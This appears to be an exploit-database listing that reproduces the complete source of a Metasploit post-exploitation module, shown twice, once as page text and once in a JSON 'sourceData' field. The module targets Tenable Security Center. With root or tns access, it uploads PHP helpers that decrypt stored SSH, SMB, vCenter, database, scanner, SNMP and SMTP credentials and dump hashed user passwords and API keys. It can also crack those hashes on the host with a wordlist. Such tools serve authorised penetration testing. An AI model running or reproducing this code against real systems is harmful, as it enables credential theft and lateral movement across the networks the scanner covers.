Tenable Security Center_MSF:POST-LINUX-GATHER-TENABLE_SECURITY_CENTER-

Description

This module collects credentials and setup information from Tenable Security Center. root or TNS user permissions are required. We don't utilize SC's builtin backup functionality as that requires SC to be shut down. The module works in 2 phases: Phase...

Visit Original Source

Basic Information

ID MSF:POST-LINUX-GATHER-TENABLE_SECURITY_CENTER-

Published May 15, 2026 at 19:02

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post

include Msf::Post::Linux::System
include Msf::Post::Linux::Priv
include Msf::Post::File
include Msf::Auxiliary::Report

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Tenable Security Center',
'Description' => %q{
This module collects credentials and setup information
from Tenable Security Center. root or TNS user permissions
are required. We don't utilize SC's builtin backup
functionality as that requires SC to be shut down.
The module works in 2 phases:

Phase 1: gather all passwords which can be decrypted. These
are non-user ones such as credentials used for scans, creds
for the Nessus servers, SMTP, etc.

Phase 2: handle hashed passwords processing. SC uses SHA-512
and PBKDF2 according to the documentation, but the implementation
(salt+hash vs hash+salt) is unknown due to the source code being
protected by SourceGuardian. To get around this, we use a php
script on server to brute force the passwords. Note this will
use SC's resources. The crack attempt rate is ~6/sec on a test
instance, so you'll want a small password list.

Tested against SC 6.7.2 on RHEL9
},
'License' => MSF_LICENSE,
'Author' => [
'h00die',
],
'Platform' => ['linux'],
'SessionTypes' => ['shell', 'meterpreter'],
'References' => [
[ 'URL', 'https://docs.tenable.com/security-center/Content/EncryptionStrength.htm']
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [],
'Reliability' => []
}
)
)
register_options [
OptPath.new('WORDLIST', [false, 'The path to an optional wordlist'])
]
register_advanced_options [
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end

def run
unless is_root? || whoami == 'tns'
fail_with(Failure::NoAccess, "Root permission or tns user required. Root permissions: #{is_root?}, username: #{whoami}")
end
fail_with(Failure::NotFound, 'Security Center not found (/opt/sc/src/defines.php)') unless file?('/opt/sc/src/defines.php')

defines = read_file('/opt/sc/src/defines.php')
version = defines.match(/define\("SC_VERSION",\s*"([^"]+)"\)/)[1]
print_good("Security Center Version: #{version}")

@sc_service_data = {
host: ::Rex::Socket.getaddress(session.sock.peerhost, true),
address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
port: '443',
service_name: 'tenable security center',
name: 'tenable security center',
protocol: 'tcp',
info: version.to_s,
workspace_id: myworkspace_id
}
report_service(@sc_service_data)

if is_root?
@command_prefix = "su - tns -s /bin/bash -c '/opt/sc/support/bin/php "
@command_postfix = "'"
else
@command_prefix = ''
@command_postfix = ''
end

gather_decrypted_creds
gather_hashed_creds
end

def gather_decrypted_creds
script_path = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alphanumeric(8..10)}"
vprint_status("Uploading database cred decryptor to #{script_path}")
fail_with(Failure::BadConfig, "Unable to write to #{script_path}") unless upload_file(script_path, ::File.join(Msf::Config.data_directory, 'post', 'tenable', 'security_center', 'pull_encrypted_database_fields.php'))
vprint_status("Running cred dumper: #{@command_prefix}#{script_path} -json#{@command_postfix}")
output = cmd_exec("#{@command_prefix}#{script_path} -json#{@command_postfix}")
rm_f(script_path)

begin
output = JSON.parse(output)
rescue JSON::ParserError => e
print_error("Error parsing JSON output: #{e}")
end

loot_path = store_loot('tenable.security_center.creds', 'application/json', session, output, 'creds.json', 'Security Center Decrypted Credentials JSON')
print_good("Decrypted Security Center credentials stored to: #{loot_path}")

tbl = Rex::Text::Table.new(
'Header' => 'Decrypted Credentials',
'Indent' => 1,
'Columns' => ['Source', 'Table', 'Username', 'Decrypted Password', 'Other Fields']
)

decrypted_flag = ' [DECRYPTED]'
::Rex::Socket.getaddress(session.sock.peerhost, true)

output.each { |cred| process_decrypted_cred(cred, tbl, decrypted_flag) }
print_good(tbl.to_s)
end

def process_decrypted_cred(cred, tbl, decrypted_flag)
case cred['_table']
when 'AppSSHCredential'
service_data = {
address: '0.0.0.0',
port: '22',
service_name: 'ssh',
protocol: 'tcp',
workspace_id: myworkspace_id
}

if cred['authType'] == 'password'
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: cred['username'],
private_data: cred['password'].gsub(decrypted_flag, ''),
private_type: :password
}
else
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: cred['username'],
private_data: cred['privateKey'].gsub("\r\n", "\n"),
private_type: :ssh_key
}
end

credential_data.merge!(service_data)
credential_core = create_credential(credential_data)

login_data = {
core: credential_core,
status: Metasploit::Model::Login::Status::UNTRIED
}

login_data.merge!(service_data)
create_credential_login(login_data)
info = cred.fetch('passphrase', '').gsub(decrypted_flag, '')
info = "SSH Key Passphrase: #{info.gsub(decrypted_flag, '')}" if info != ''

tbl << [cred['_source'], cred['_table'], cred['username'], credential_data[:private_data].gsub("\n", ''), info]

# check if they have privilege creds
if cred.key?('escalationPassword') && cred['escalationPassword'].gsub(decrypted_flag, '') != ''
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: cred.fetch('escalationUsername', cred.fetch('escalationSuUser', cred.fetch('escalationAccount', ''))).gsub(decrypted_flag, ''),
private_data: cred['escalationPassword'].gsub(decrypted_flag, ''),
private_type: :password
}

credential_data.merge!(service_data)
credential_core = create_credential(credential_data)

login_data = {
core: credential_core,
status: Metasploit::Model::Login::Status::UNTRIED
}

login_data.merge!(service_data)
tbl << [cred['_source'], cred['_table'], credential_data[:username], credential_data[:private_data], "Escalation method: #{cred['privilegeEscalation']}"]
end
when 'AppWindowsCredential'
service_data = {
address: '0.0.0.0',
port: '445',
service_name: 'smb',
protocol: 'tcp',
workspace_id: myworkspace_id
}

credential_data = {
origin_type: :service,
module_fullname: fullname,
username: cred['username'],
private_data: cred['password'].gsub(decrypted_flag, ''),
private_type: :password
}
unless cred['domain'] == ''
credential_data[:realm_key] = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
credential_data[:realm_value] = cred['domain']
end

credential_data.merge!(service_data)
credential_core = create_credential(credential_data)

login_data = {
core: credential_core,
status: Metasploit::Model::Login::Status::UNTRIED
}

login_data.merge!(service_data)
create_credential_login(login_data)

tbl << [cred['_source'], cred['_table'], cred['username'], cred['password'].gsub(decrypted_flag, ''), '']
when 'AppVMwarevCenterCredential'
service_data = {
address: cred['vcenter_host'],
port: cred['vcenter_port'],
service_name: 'vcenter',
protocol: 'tcp',
workspace_id: myworkspace_id
}

credential_data = {
origin_type: :service,
module_fullname: fullname,
username: cred['vcenter_username'],
private_data: cred['vcenter_password'].gsub(decrypted_flag, ''),
private_type: :password
}

credential_data.merge!(service_data)
credential_core = create_credential(credential_data)

login_data = {
core: credential_core,
status: Metasploit::Model::Login::Status::UNTRIED
}

login_data.merge!(service_data)
create_credential_login(login_data)

tbl << [cred['_source'], cred['_table'], cred['vcenter_username'], cred['vcenter_password'].gsub(decrypted_flag, ''), '']
when 'AppMongoDBCredential'
service_data = {
address: '0.0.0.0',
port: cred['mongodb_port'],
service_name: 'mongodb',
protocol: 'tcp',
workspace_id: myworkspace_id
}

credential_data = {
origin_type: :service,
module_fullname: fullname,
username: cred['mongodb_username'],
private_data: cred['mongodb_password'].gsub(decrypted_flag, ''),
private_type: :password
}

credential_data.merge!(service_data)
credential_core = create_credential(credential_data)

login_data = {
core: credential_core,
status: Metasploit::Model::Login::Status::UNTRIED
}

login_data.merge!(service_data)
create_credential_login(login_data)

tbl << [cred['_source'], cred['_table'], cred['mongodb_username'], cred['mongodb_password'].gsub(decrypted_flag, ''), cred['mongodb_database']]
when 'AppDatabaseCredential'
service_data = {
address: '0.0.0.0',
port: cred['port'],
service_name: cred['dbType'],
protocol: 'tcp',
workspace_id: myworkspace_id
}

credential_data = {
origin_type: :service,
module_fullname: fullname,
username: cred['username'],
private_data: cred['password'].gsub(decrypted_flag, ''),
private_type: :password
}

credential_data.merge!(service_data)
credential_core = create_credential(credential_data)

login_data = {
core: credential_core,
status: Metasploit::Model::Login::Status::UNTRIED
}

login_data.merge!(service_data)
create_credential_login(login_data)

tbl << [cred['_source'], cred['_table'], cred['username'], cred['password'].gsub(decrypted_flag, ''), cred['dbType']]
when 'Scanner'
service_data = {
address: cred['ip'],
port: cred['port'],
service_name: cred['nessusType'],
protocol: 'tcp',
workspace_id: myworkspace_id
}

credential_data = {
origin_type: :service,
module_fullname: fullname,
username: cred['username'],
private_data: cred['password'].gsub(decrypted_flag, ''),
private_type: :password
}

credential_data.merge!(service_data)
credential_core = create_credential(credential_data)

login_data = {
core: credential_core,
status: Metasploit::Model::Login::Status::UNTRIED
}

login_data.merge!(service_data)
create_credential_login(login_data)

tbl << [cred['_source'], cred['_table'], cred['username'], cred['password'].gsub(decrypted_flag, ''), "Scanner Type: #{cred['nessusType']}"]
when 'SNMPCredential'
service_data = {
address: '0.0.0.0',
port: '161',
service_name: 'snmp',
protocol: 'udp',
workspace_id: myworkspace_id
}

credential_data = {
origin_type: :service,
module_fullname: fullname,
username: '',
private_data: cred['communityString'].gsub(decrypted_flag, ''),
private_type: :password
}

credential_data.merge!(service_data)
credential_core = create_credential(credential_data)

login_data = {
core: credential_core,
status: Metasploit::Model::Login::Status::UNTRIED
}

login_data.merge!(service_data)
create_credential_login(login_data)

tbl << [cred['_source'], cred['_table'], '', cred['communityString'].gsub(decrypted_flag, ''), '']
when 'Configuration' # SMTP
addr = if ::Rex::Socket.is_ip_addr?(cred['SMTPHost'])
cred['SMTPHost']
else
begin
::Rex::Socket.getaddress(cred['SMTPHost'], true)
rescue StandardError
'0.0.0.0'
end
end

service_data = {
address: addr,
port: cred['SMTPPort'],
service_name: 'smtp',
protocol: 'tcp',
workspace_id: myworkspace_id
}

credential_data = {
origin_type: :service,
module_fullname: fullname,
username: cred['SMTPUsername'],
private_data: cred['SMTPPassword'].gsub(decrypted_flag, ''),
private_type: :password
}

credential_data.merge!(service_data)
credential_core = create_credential(credential_data)

login_data = {
core: credential_core,
status: Metasploit::Model::Login::Status::UNTRIED
}

login_data.merge!(service_data)
create_credential_login(login_data)

tbl << [cred['_source'], cred['_table'], cred['SMTPUsername'], cred['SMTPPassword'].gsub(decrypted_flag, ''), '']
else
username = cred.fetch('username', '')
password = cred.fetch('password', '').gsub(decrypted_flag, '')
tbl << [cred['_source'], cred['_table'], username, password, '']
print_warning('Please reivew loot for additional details')
end
end

def gather_hashed_creds
script_path = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alphanumeric(8..10)}"
vprint_status("Uploading database cred dumper to #{script_path}")
fail_with(Failure::BadConfig, "Unable to write to #{script_path}") unless upload_file(script_path, ::File.join(Msf::Config.data_directory, 'post', 'tenable', 'security_center', 'dump_crack_hashes.php'))
vprint_status("Running cred dumper: #{@command_prefix}#{script_path} -json#{@command_postfix}")
output = JSON.parse(cmd_exec("#{@command_prefix}#{script_path} -json#{@command_postfix}"))

loot_path = store_loot('tenable.security_center.creds.hashed', 'application/json', session, output, 'hashed_creds.json', 'Security Center Credentials JSON')
print_good("Decrypted Security Center credentials stored to: #{loot_path}")

cred_tbl = Rex::Text::Table.new(
'Header' => 'Accounts Hashes',
'Indent' => 1,
'Columns' => ['UserID', 'Org', 'Username', 'Salt:Hash']
)
api_keys_tbl = Rex::Text::Table.new(
'Header' => 'API Keys',
'Indent' => 1,
'Columns' => ['ID', 'User ID', 'Name', 'Access Key', 'Salt:Hash']
)

output.each do |cred|
case cred['_table']
when 'APIKey'
api_keys_tbl << [cred['id'], cred['userAuthID'], cred['name'], cred['accessKey'], "#{cred['salt']}:#{cred['key']}"]
when 'UserAuth'
cred_tbl << [cred['id'], cred['orgID'], cred['username'], "#{cred['salt']}:#{cred['password']}"]
end
end

print_good(api_keys_tbl.to_s) unless api_keys_tbl.rows.empty?
print_good(cred_tbl.to_s) unless cred_tbl.rows.empty?

unless datastore['WORDLIST']
rm_f(script_path)
return
end

crack_hashes(output, script_path)
end

def crack_hashes(hashed_output, script_path)
wordlist_lines = File.read(datastore['WORDLIST']).lines.count
estimate_minutes = ((hashed_output.length * wordlist_lines) / 6.0 / 60).round(1)
print_warning("Estimated brute force time: #{estimate_minutes} minutes (#{hashed_output.length} users x #{wordlist_lines} words @ 6/sec)")
print_warning('Waiting 5 seconds for user interuption if this is too long a time.')
sleep(5)

wordlist_path = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alphanumeric(8..10)}"
vprint_status("Uploading wordlist to: #{wordlist_path}")
fail_with(Failure::BadConfig, "Unable to write to #{wordlist_path}") unless upload_file(wordlist_path, datastore['WORDLIST'])

output = JSON.parse(cmd_exec("#{@command_prefix}#{script_path} -json -crack #{wordlist_path}#{@command_postfix}").lines[1..].join)
rm_f(script_path)
rm_f(wordlist_path)

cracked_tbl = Rex::Text::Table.new(
'Header' => 'Cracked Credentials',
'Indent' => 1,
'Columns' => ['ID', 'User', 'Password', 'Admin']
)
output.each do |cred|
cracked_tbl << [cred['id'], cred['username'], cred['password'], cred['isAdmin']]
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: cred['username'],
private_data: cred['password'],
private_type: :password
}

credential_data.merge!(@sc_service_data)
create_credential(credential_data)
end

print_good(cracked_tbl.to_s) unless cracked_tbl.rows.empty?
end
end

{
    "lastseen": "2026-05-15T19:28:16",
    "description": "This module collects credentials and setup information from Tenable Security Center. root or TNS user permissions are required. We don't utilize SC's builtin backup functionality as that requires SC to be shut down. The module works in 2 phases: Phase...",
    "published": "2026-05-15T19:02:31",
    "modified": "2026-05-15T19:02:31",
    "type": "metasploit",
    "title": "Tenable Security Center",
    "source": "",
    "references": "",
    "id": "MSF:POST-LINUX-GATHER-TENABLE_SECURITY_CENTER-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n  include Msf::Post::Linux::System\n  include Msf::Post::Linux::Priv\n  include Msf::Post::File\n  include Msf::Auxiliary::Report\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'Tenable Security Center',\n        'Description' => %q{\n          This module collects credentials and setup information\n          from Tenable Security Center. root or TNS user permissions\n          are required. We don't utilize SC's builtin backup\n          functionality as that requires SC to be shut down.\n          The module works in 2 phases:\n\n          Phase 1: gather all passwords which can be decrypted. These\n          are non-user ones such as credentials used for scans, creds\n          for the Nessus servers, SMTP, etc.\n\n          Phase 2: handle hashed passwords processing. SC uses SHA-512\n          and PBKDF2 according to the documentation, but the implementation\n          (salt+hash vs hash+salt) is unknown due to the source code being\n          protected by SourceGuardian. To get around this, we use a php\n          script on server to brute force the passwords. Note this will\n          use SC's resources. The crack attempt rate is ~6/sec on a test\n          instance, so you'll want a small password list.\n\n          Tested against SC 6.7.2 on RHEL9\n        },\n        'License' => MSF_LICENSE,\n        'Author' => [\n          'h00die',\n        ],\n        'Platform' => ['linux'],\n        'SessionTypes' => ['shell', 'meterpreter'],\n        'References' => [\n          [ 'URL', 'https://docs.tenable.com/security-center/Content/EncryptionStrength.htm']\n        ],\n        'Notes' => {\n          'Stability' => [CRASH_SAFE],\n          'SideEffects' => [],\n          'Reliability' => []\n        }\n      )\n    )\n    register_options [\n      OptPath.new('WORDLIST', [false, 'The path to an optional wordlist'])\n    ]\n    register_advanced_options [\n      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n    ]\n  end\n\n  def run\n    unless is_root? || whoami == 'tns'\n      fail_with(Failure::NoAccess, \"Root permission or tns user required. Root permissions: #{is_root?}, username: #{whoami}\")\n    end\n    fail_with(Failure::NotFound, 'Security Center not found (/opt/sc/src/defines.php)') unless file?('/opt/sc/src/defines.php')\n\n    defines = read_file('/opt/sc/src/defines.php')\n    version = defines.match(/define\\(\"SC_VERSION\",\\s*\"([^\"]+)\"\\)/)[1]\n    print_good(\"Security Center Version: #{version}\")\n\n    @sc_service_data = {\n      host: ::Rex::Socket.getaddress(session.sock.peerhost, true),\n      address: ::Rex::Socket.getaddress(session.sock.peerhost, true),\n      port: '443',\n      service_name: 'tenable security center',\n      name: 'tenable security center',\n      protocol: 'tcp',\n      info: version.to_s,\n      workspace_id: myworkspace_id\n    }\n    report_service(@sc_service_data)\n\n    if is_root?\n      @command_prefix = \"su - tns -s /bin/bash -c '/opt/sc/support/bin/php \"\n      @command_postfix = \"'\"\n    else\n      @command_prefix = ''\n      @command_postfix = ''\n    end\n\n    gather_decrypted_creds\n    gather_hashed_creds\n  end\n\n  def gather_decrypted_creds\n    script_path = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alphanumeric(8..10)}\"\n    vprint_status(\"Uploading database cred decryptor to #{script_path}\")\n    fail_with(Failure::BadConfig, \"Unable to write to #{script_path}\") unless upload_file(script_path, ::File.join(Msf::Config.data_directory, 'post', 'tenable', 'security_center', 'pull_encrypted_database_fields.php'))\n    vprint_status(\"Running cred dumper: #{@command_prefix}#{script_path} -json#{@command_postfix}\")\n    output = cmd_exec(\"#{@command_prefix}#{script_path} -json#{@command_postfix}\")\n    rm_f(script_path)\n\n    begin\n      output = JSON.parse(output)\n    rescue JSON::ParserError => e\n      print_error(\"Error parsing JSON output: #{e}\")\n    end\n\n    loot_path = store_loot('tenable.security_center.creds', 'application/json', session, output, 'creds.json', 'Security Center Decrypted Credentials JSON')\n    print_good(\"Decrypted Security Center credentials stored to: #{loot_path}\")\n\n    tbl = Rex::Text::Table.new(\n      'Header' => 'Decrypted Credentials',\n      'Indent' => 1,\n      'Columns' => ['Source', 'Table', 'Username', 'Decrypted Password', 'Other Fields']\n    )\n\n    decrypted_flag = ' [DECRYPTED]'\n    ::Rex::Socket.getaddress(session.sock.peerhost, true)\n\n    output.each { |cred| process_decrypted_cred(cred, tbl, decrypted_flag) }\n    print_good(tbl.to_s)\n  end\n\n  def process_decrypted_cred(cred, tbl, decrypted_flag)\n    case cred['_table']\n    when 'AppSSHCredential'\n      service_data = {\n        address: '0.0.0.0',\n        port: '22',\n        service_name: 'ssh',\n        protocol: 'tcp',\n        workspace_id: myworkspace_id\n      }\n\n      if cred['authType'] == 'password'\n        credential_data = {\n          origin_type: :service,\n          module_fullname: fullname,\n          username: cred['username'],\n          private_data: cred['password'].gsub(decrypted_flag, ''),\n          private_type: :password\n        }\n      else\n        credential_data = {\n          origin_type: :service,\n          module_fullname: fullname,\n          username: cred['username'],\n          private_data: cred['privateKey'].gsub(\"\\r\\n\", \"\\n\"),\n          private_type: :ssh_key\n        }\n      end\n\n      credential_data.merge!(service_data)\n      credential_core = create_credential(credential_data)\n\n      login_data = {\n        core: credential_core,\n        status: Metasploit::Model::Login::Status::UNTRIED\n      }\n\n      login_data.merge!(service_data)\n      create_credential_login(login_data)\n      info = cred.fetch('passphrase', '').gsub(decrypted_flag, '')\n      info = \"SSH Key Passphrase: #{info.gsub(decrypted_flag, '')}\" if info != ''\n\n      tbl << [cred['_source'], cred['_table'], cred['username'], credential_data[:private_data].gsub(\"\\n\", ''), info]\n\n      # check if they have privilege creds\n      if cred.key?('escalationPassword') && cred['escalationPassword'].gsub(decrypted_flag, '') != ''\n        credential_data = {\n          origin_type: :service,\n          module_fullname: fullname,\n          username: cred.fetch('escalationUsername', cred.fetch('escalationSuUser', cred.fetch('escalationAccount', ''))).gsub(decrypted_flag, ''),\n          private_data: cred['escalationPassword'].gsub(decrypted_flag, ''),\n          private_type: :password\n        }\n\n        credential_data.merge!(service_data)\n        credential_core = create_credential(credential_data)\n\n        login_data = {\n          core: credential_core,\n          status: Metasploit::Model::Login::Status::UNTRIED\n        }\n\n        login_data.merge!(service_data)\n        tbl << [cred['_source'], cred['_table'], credential_data[:username], credential_data[:private_data], \"Escalation method: #{cred['privilegeEscalation']}\"]\n      end\n    when 'AppWindowsCredential'\n      service_data = {\n        address: '0.0.0.0',\n        port: '445',\n        service_name: 'smb',\n        protocol: 'tcp',\n        workspace_id: myworkspace_id\n      }\n\n      credential_data = {\n        origin_type: :service,\n        module_fullname: fullname,\n        username: cred['username'],\n        private_data: cred['password'].gsub(decrypted_flag, ''),\n        private_type: :password\n      }\n      unless cred['domain'] == ''\n        credential_data[:realm_key] = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN\n        credential_data[:realm_value] = cred['domain']\n      end\n\n      credential_data.merge!(service_data)\n      credential_core = create_credential(credential_data)\n\n      login_data = {\n        core: credential_core,\n        status: Metasploit::Model::Login::Status::UNTRIED\n      }\n\n      login_data.merge!(service_data)\n      create_credential_login(login_data)\n\n      tbl << [cred['_source'], cred['_table'], cred['username'], cred['password'].gsub(decrypted_flag, ''), '']\n    when 'AppVMwarevCenterCredential'\n      service_data = {\n        address: cred['vcenter_host'],\n        port: cred['vcenter_port'],\n        service_name: 'vcenter',\n        protocol: 'tcp',\n        workspace_id: myworkspace_id\n      }\n\n      credential_data = {\n        origin_type: :service,\n        module_fullname: fullname,\n        username: cred['vcenter_username'],\n        private_data: cred['vcenter_password'].gsub(decrypted_flag, ''),\n        private_type: :password\n      }\n\n      credential_data.merge!(service_data)\n      credential_core = create_credential(credential_data)\n\n      login_data = {\n        core: credential_core,\n        status: Metasploit::Model::Login::Status::UNTRIED\n      }\n\n      login_data.merge!(service_data)\n      create_credential_login(login_data)\n\n      tbl << [cred['_source'], cred['_table'], cred['vcenter_username'], cred['vcenter_password'].gsub(decrypted_flag, ''), '']\n    when 'AppMongoDBCredential'\n      service_data = {\n        address: '0.0.0.0',\n        port: cred['mongodb_port'],\n        service_name: 'mongodb',\n        protocol: 'tcp',\n        workspace_id: myworkspace_id\n      }\n\n      credential_data = {\n        origin_type: :service,\n        module_fullname: fullname,\n        username: cred['mongodb_username'],\n        private_data: cred['mongodb_password'].gsub(decrypted_flag, ''),\n        private_type: :password\n      }\n\n      credential_data.merge!(service_data)\n      credential_core = create_credential(credential_data)\n\n      login_data = {\n        core: credential_core,\n        status: Metasploit::Model::Login::Status::UNTRIED\n      }\n\n      login_data.merge!(service_data)\n      create_credential_login(login_data)\n\n      tbl << [cred['_source'], cred['_table'], cred['mongodb_username'], cred['mongodb_password'].gsub(decrypted_flag, ''), cred['mongodb_database']]\n    when 'AppDatabaseCredential'\n      service_data = {\n        address: '0.0.0.0',\n        port: cred['port'],\n        service_name: cred['dbType'],\n        protocol: 'tcp',\n        workspace_id: myworkspace_id\n      }\n\n      credential_data = {\n        origin_type: :service,\n        module_fullname: fullname,\n        username: cred['username'],\n        private_data: cred['password'].gsub(decrypted_flag, ''),\n        private_type: :password\n      }\n\n      credential_data.merge!(service_data)\n      credential_core = create_credential(credential_data)\n\n      login_data = {\n        core: credential_core,\n        status: Metasploit::Model::Login::Status::UNTRIED\n      }\n\n      login_data.merge!(service_data)\n      create_credential_login(login_data)\n\n      tbl << [cred['_source'], cred['_table'], cred['username'], cred['password'].gsub(decrypted_flag, ''), cred['dbType']]\n    when 'Scanner'\n      service_data = {\n        address: cred['ip'],\n        port: cred['port'],\n        service_name: cred['nessusType'],\n        protocol: 'tcp',\n        workspace_id: myworkspace_id\n      }\n\n      credential_data = {\n        origin_type: :service,\n        module_fullname: fullname,\n        username: cred['username'],\n        private_data: cred['password'].gsub(decrypted_flag, ''),\n        private_type: :password\n      }\n\n      credential_data.merge!(service_data)\n      credential_core = create_credential(credential_data)\n\n      login_data = {\n        core: credential_core,\n        status: Metasploit::Model::Login::Status::UNTRIED\n      }\n\n      login_data.merge!(service_data)\n      create_credential_login(login_data)\n\n      tbl << [cred['_source'], cred['_table'], cred['username'], cred['password'].gsub(decrypted_flag, ''), \"Scanner Type: #{cred['nessusType']}\"]\n    when 'SNMPCredential'\n      service_data = {\n        address: '0.0.0.0',\n        port: '161',\n        service_name: 'snmp',\n        protocol: 'udp',\n        workspace_id: myworkspace_id\n      }\n\n      credential_data = {\n        origin_type: :service,\n        module_fullname: fullname,\n        username: '',\n        private_data: cred['communityString'].gsub(decrypted_flag, ''),\n        private_type: :password\n      }\n\n      credential_data.merge!(service_data)\n      credential_core = create_credential(credential_data)\n\n      login_data = {\n        core: credential_core,\n        status: Metasploit::Model::Login::Status::UNTRIED\n      }\n\n      login_data.merge!(service_data)\n      create_credential_login(login_data)\n\n      tbl << [cred['_source'], cred['_table'], '', cred['communityString'].gsub(decrypted_flag, ''), '']\n    when 'Configuration' # SMTP\n      addr = if ::Rex::Socket.is_ip_addr?(cred['SMTPHost'])\n               cred['SMTPHost']\n             else\n               begin\n                 ::Rex::Socket.getaddress(cred['SMTPHost'], true)\n               rescue StandardError\n                 '0.0.0.0'\n               end\n             end\n\n      service_data = {\n        address: addr,\n        port: cred['SMTPPort'],\n        service_name: 'smtp',\n        protocol: 'tcp',\n        workspace_id: myworkspace_id\n      }\n\n      credential_data = {\n        origin_type: :service,\n        module_fullname: fullname,\n        username: cred['SMTPUsername'],\n        private_data: cred['SMTPPassword'].gsub(decrypted_flag, ''),\n        private_type: :password\n      }\n\n      credential_data.merge!(service_data)\n      credential_core = create_credential(credential_data)\n\n      login_data = {\n        core: credential_core,\n        status: Metasploit::Model::Login::Status::UNTRIED\n      }\n\n      login_data.merge!(service_data)\n      create_credential_login(login_data)\n\n      tbl << [cred['_source'], cred['_table'], cred['SMTPUsername'], cred['SMTPPassword'].gsub(decrypted_flag, ''), '']\n    else\n      username = cred.fetch('username', '')\n      password = cred.fetch('password', '').gsub(decrypted_flag, '')\n      tbl << [cred['_source'], cred['_table'], username, password, '']\n      print_warning('Please reivew loot for additional details')\n    end\n  end\n\n  def gather_hashed_creds\n    script_path = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alphanumeric(8..10)}\"\n    vprint_status(\"Uploading database cred dumper to #{script_path}\")\n    fail_with(Failure::BadConfig, \"Unable to write to #{script_path}\") unless upload_file(script_path, ::File.join(Msf::Config.data_directory, 'post', 'tenable', 'security_center', 'dump_crack_hashes.php'))\n    vprint_status(\"Running cred dumper: #{@command_prefix}#{script_path} -json#{@command_postfix}\")\n    output = JSON.parse(cmd_exec(\"#{@command_prefix}#{script_path} -json#{@command_postfix}\"))\n\n    loot_path = store_loot('tenable.security_center.creds.hashed', 'application/json', session, output, 'hashed_creds.json', 'Security Center Credentials JSON')\n    print_good(\"Decrypted Security Center credentials stored to: #{loot_path}\")\n\n    cred_tbl = Rex::Text::Table.new(\n      'Header' => 'Accounts Hashes',\n      'Indent' => 1,\n      'Columns' => ['UserID', 'Org', 'Username', 'Salt:Hash']\n    )\n    api_keys_tbl = Rex::Text::Table.new(\n      'Header' => 'API Keys',\n      'Indent' => 1,\n      'Columns' => ['ID', 'User ID', 'Name', 'Access Key', 'Salt:Hash']\n    )\n\n    output.each do |cred|\n      case cred['_table']\n      when 'APIKey'\n        api_keys_tbl << [cred['id'], cred['userAuthID'], cred['name'], cred['accessKey'], \"#{cred['salt']}:#{cred['key']}\"]\n      when 'UserAuth'\n        cred_tbl << [cred['id'], cred['orgID'], cred['username'], \"#{cred['salt']}:#{cred['password']}\"]\n      end\n    end\n\n    print_good(api_keys_tbl.to_s) unless api_keys_tbl.rows.empty?\n    print_good(cred_tbl.to_s) unless cred_tbl.rows.empty?\n\n    unless datastore['WORDLIST']\n      rm_f(script_path)\n      return\n    end\n\n    crack_hashes(output, script_path)\n  end\n\n  def crack_hashes(hashed_output, script_path)\n    wordlist_lines = File.read(datastore['WORDLIST']).lines.count\n    estimate_minutes = ((hashed_output.length * wordlist_lines) / 6.0 / 60).round(1)\n    print_warning(\"Estimated brute force time: #{estimate_minutes} minutes (#{hashed_output.length} users x #{wordlist_lines} words @ 6/sec)\")\n    print_warning('Waiting 5 seconds for user interuption if this is too long a time.')\n    sleep(5)\n\n    wordlist_path = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alphanumeric(8..10)}\"\n    vprint_status(\"Uploading wordlist to: #{wordlist_path}\")\n    fail_with(Failure::BadConfig, \"Unable to write to #{wordlist_path}\") unless upload_file(wordlist_path, datastore['WORDLIST'])\n\n    output = JSON.parse(cmd_exec(\"#{@command_prefix}#{script_path} -json -crack #{wordlist_path}#{@command_postfix}\").lines[1..].join)\n    rm_f(script_path)\n    rm_f(wordlist_path)\n\n    cracked_tbl = Rex::Text::Table.new(\n      'Header' => 'Cracked Credentials',\n      'Indent' => 1,\n      'Columns' => ['ID', 'User', 'Password', 'Admin']\n    )\n    output.each do |cred|\n      cracked_tbl << [cred['id'], cred['username'], cred['password'], cred['isAdmin']]\n      credential_data = {\n        origin_type: :service,\n        module_fullname: fullname,\n        username: cred['username'],\n        private_data: cred['password'],\n        private_type: :password\n      }\n\n      credential_data.merge!(@sc_service_data)\n      create_credential(credential_data)\n    end\n\n    print_good(cracked_tbl.to_s) unless cracked_tbl.rows.empty?\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/tenable_security_center.rb",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/post/linux/gather/tenable_security_center/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
